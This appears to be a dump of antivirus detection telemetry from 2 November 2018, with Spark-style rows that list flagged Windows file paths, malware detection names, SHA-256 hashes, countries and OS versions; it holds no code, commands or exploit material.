  Row(detection=Row(filename='avscan-20181102-055223-70cee1ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055223-70CEE1CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050340-a234454a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050340-A234454A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113730-18add7a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7848c3b7\\AVSCAN-20181102-113633-0CEA1F3A\\AVSCAN-20181102-113730-18ADD7A5', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:37:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001ffd', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001ffd', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4480.14843\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4480.14843\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:29:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ngtqlscq.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\ngtqlSCQ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050247-82b213a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050247-82B213A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054522-75a17947', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054522-75A17947', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\SOUNDS\\SOUNDS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='4b57ecc6e9115ba08e192ea16377360cadde4b544802e70c08983a5b97471ca3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193220-9a2c2e01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1372292e\\AVSCAN-20181102-192920-78DDFEB6\\AVSCAN-20181102-193220-9A2C2E01', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:32:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055247-7f2a3c4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055247-7F2A3C4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052220-3dcbf686', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052220-3DCBF686', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-224739-62040035', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b19b5d61\\AVSCAN-20181102-224703-5CFE8933\\AVSCAN-20181102-224739-62040035', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:47:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oodpwnib.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\ooDPWNiB.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061407-79b1941b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061407-79B1941B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050712-20ff3a92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050712-20FF3A92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232128-09077812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-232034-03E7900C\\AVSCAN-20181102-232128-09077812', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061258-50ead3f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061258-50EAD3F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193027-8545497c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1372292e\\AVSCAN-20181102-192920-78DDFEB6\\AVSCAN-20181102-193027-8545497C', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:30:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T21:30:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122135-6925a77a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122135-6925A77A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122454-8e339a1a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122454-8E339A1A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081050-f63d0c8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7419a4dd\\AVSCAN-20181102-080545-C607EBBA\\AVSCAN-20181102-081050-F63D0C8A', filesize=1472000, name='HEUR/AGEN.1035060.#M1.#R1'), hash='5698f2c983b9ccd496677bda076cadbdf8cad6db3ebe230184899805cd313bb0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050429-bfa63359', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050429-BFA63359', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061939-3f967055', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061939-3F967055', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d381519c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D381519C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053627-368655d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053627-368655D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052430-8b98aa72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052430-8B98AA72', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052720-f0dfa9a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052720-F0DFA9A7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba110a7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA110A7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052356-7770f570', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052356-7770F570', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060019-8c0b5bc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060019-8C0B5BC3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062535-13ab1141', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062535-13AB1141', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062648-3f7e9f85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062648-3F7E9F85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050950-7ebce590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050950-7EBCE590', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061318-5cce6ddb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061318-5CCE6DDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055534-e23162eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055534-E23162EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054042-cedbad55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054042-CEDBAD55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055026-2aec2fc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055026-2AEC2FC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050524-e046f405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050524-E046F405', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061938-3f0f3b3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061938-3F0F3B3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055012-22794211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055012-22794211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061318-5ca07e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061318-5CA07E3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055528-dec9671f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055528-DEC9671F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050407-b2b04ba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050407-B2B04BA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060034-955076f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060034-955076F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-1678302a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-1678302A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053709-4fdf50e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053709-4FDF50E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055001-1bc4bef2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055001-1BC4BEF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051159-cbab52fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051159-CBAB52FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050239-7e45c9ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050239-7E45C9EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052541-b5d885d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052541-B5D885D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:40Z'), dt=datetime.date(2018, 11, 2)),
